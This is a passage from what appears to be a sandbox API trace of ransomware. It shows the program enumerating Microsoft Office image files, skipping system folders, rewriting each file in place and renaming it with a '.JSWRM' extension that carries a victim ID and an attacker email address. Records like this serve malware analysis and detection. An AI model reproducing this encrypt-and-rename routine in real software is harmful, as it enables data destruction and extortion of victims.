ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa5d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.scale-140.png", cAlternateFileName="WINWOR~2.PNG")) returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2=".") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="..") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="...") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="windows") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="recovery") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="perflogs") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="documents and settings") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="system volume information") returned 1 [0134.485] lstrcmpiW (lpString1="WinWordLogo.scale-140.png", lpString2="msocache") returned 1 [0134.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0134.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0134.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x241218, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0134.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0134.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0134.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0134.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-140.png", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 25 [0134.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0134.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0134.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0134.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0134.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.487] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2653) returned 1 [0134.487] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.487] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa50) returned 0x22fd48 [0134.487] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa50, lpOverlapped=0x0) returned 1 [0134.488] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.488] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa50, lpOverlapped=0x0) returned 1 [0134.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0134.489] CloseHandle (hObject=0x238) returned 1 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0134.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0134.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0134.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f280 [0134.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0134.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.489] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0134.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0134.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0134.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0134.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0134.490] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.scale-180.png", cAlternateFileName="WIACD7~1.PNG")) returned 1 [0134.490] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2=".") returned 1 [0134.490] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="..") returned 1 [0134.490] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="...") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="windows") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="recovery") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="perflogs") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="documents and settings") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="system volume information") returned 1 [0134.491] lstrcmpiW (lpString1="WinWordLogo.scale-180.png", lpString2="msocache") returned 1 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0134.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d890 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-180.png", cchWideChar=25, lpMultiByteStr=0x240f20, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 25 [0134.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d890 | out: hHeap=0x1e0000) returned 1 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0134.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0134.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.492] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3616) returned 1 [0134.492] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe20) returned 0x24e1d8 [0134.492] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe20, lpOverlapped=0x0) returned 1 [0134.493] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.494] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe20, lpOverlapped=0x0) returned 1 [0134.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0134.494] CloseHandle (hObject=0x238) returned 1 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0134.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0134.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0134.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0134.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0134.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0134.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0134.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0134.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0134.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0134.495] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1af55fee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1af55fee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1af7c22b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x82c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.scale-80.png", cAlternateFileName="WI8265~1.PNG")) returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2=".") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="..") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="...") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="windows") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="recovery") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="perflogs") returned 1 [0134.495] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="documents and settings") returned 1 [0134.496] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.496] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="system volume information") returned 1 [0134.496] lstrcmpiW (lpString1="WinWordLogo.scale-80.png", lpString2="msocache") returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x241358, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0134.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinWordLogo.scale-80.png", cchWideChar=24, lpMultiByteStr=0x241268, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinWordLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 24 [0134.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0134.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0134.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.497] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2092) returned 1 [0134.497] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x20c6c0 [0134.497] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0134.498] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.498] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0134.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.498] CloseHandle (hObject=0x238) returned 1 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0134.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0134.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0134.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0134.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0134.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0134.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinWordLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winwordlogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0134.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0134.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0134.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0134.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0134.500] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8a15c5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8a15c5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, 